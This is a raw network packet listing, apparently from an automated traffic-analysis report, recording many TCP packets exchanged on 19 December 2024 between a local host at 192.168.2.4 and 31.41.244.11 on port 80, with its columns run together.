                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.700620890 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.835299969 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.835417032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.835475922 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.835896015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.835951090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.835952044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.835994959 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.836697102 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.836745977 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.836812973 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.836859941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.837824106 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.837872982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.837919950 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.837970972 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.838371992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.838480949 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.838526964 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.839488029 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.839540958 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.839610100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.839658022 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.840565920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.840686083 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.840723038 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.840739965 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.841645956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.841758966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.841808081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.842726946 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.842782021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.842844963 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.842896938 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.843838930 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.843884945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.843966961 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.844017982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.844904900 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.844957113 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.845033884 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.845083952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.846018076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.846071005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.846111059 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.846160889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.847091913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.847239017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.847256899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.847294092 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.848233938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.848310947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.848315954 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.848362923 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.849277973 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.849337101 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.849364996 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.849415064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.850363016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.850413084 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.850474119 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.850521088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.851449966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.851496935 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.851577044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.851624966 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.852545977 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.852592945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.852669001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.852716923 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.853651047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.853698969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.853739023 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.853785038 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.854728937 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.854818106 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.854866028 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.855820894 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.855869055 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.855926991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.855971098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.856904984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.856940985 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.856955051 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.856987000 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.858000994 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.858047009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.858120918 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.858165026 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.859375954 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.859426022 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.859487057 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.859538078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.860306025 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.860358000 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.860404968 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.861248016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.861355066 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.861412048 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.862350941 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.862453938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.862507105 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.863445044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.863497972 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.863557100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.863605976 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.864518881 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.864573002 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.864634037 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.864694118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.865609884 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.865737915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.865786076 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.866691113 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.866807938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.866856098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.867796898 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.867846012 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.867904902 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.867954969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.868935108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.868985891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.868988991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.869030952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.870012999 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.870047092 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.870101929 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.871052027 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.871181011 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.871243954 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.872143030 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.872257948 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.872272015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.872320890 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.873224974 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.873341084 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.873388052 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.874342918 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.874485016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.874535084 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.875426054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.875474930 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.875540018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.875585079 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.876600981 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.876648903 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.876708984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.876755953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.877621889 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.877671003 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.877744913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.877789974 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.878696918 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.878799915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.878846884 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.879775047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.879842043 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.879901886 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.879951000 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.880862951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.880909920 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.880970001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.881016016 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.882226944 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.882262945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.882281065 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.882309914 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.883088112 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.883213997 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.883268118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.884150028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.884287119 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.884344101 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.885226011 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.885277033 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.885291100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.885340929 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.886327028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.886383057 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.886426926 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.886487007 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.887425900 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.887551069 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.887600899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.888509035 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.888676882 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.888730049 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.889579058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.889631033 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.889692068 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.889744043 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.890669107 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.890732050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.890773058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.890882969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.891772032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.891825914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.891880035 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.027370930 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.027431011 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.027524948 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.027988911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.028038979 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.028043985 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.028091908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.028990030 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.029037952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.029087067 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.029129982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.030071974 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.030421972 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.030471087 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.030503988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.030550957 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.031505108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.031567097 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.031627893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.031678915 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.032644987 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.032743931 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.032767057 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.032792091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.033704996 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.033782005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.033857107 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.033910036 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.034781933 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.034849882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.034898996 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.034950972 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.035855055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.035922050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.035983086 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.036031008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.036964893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.037019014 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.037077904 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.037126064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.038033009 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.038084030 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.038136005 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.038183928 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.039124966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.039184093 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.039246082 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.039293051 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042526960 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042563915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042645931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042753935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042788982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042797089 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042829990 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042876005 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042911053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042916059 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.042948961 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.043998957 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.044177055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.044231892 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.045011997 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.045068026 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.045147896 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.045192957 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.046272039 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.046307087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.046339035 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.046365023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.047282934 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.047336102 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.047408104 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.048268080 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.048455954 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.048532009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.049500942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.049536943 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.049582958 CET4983880192.168.2.431.41.244.11
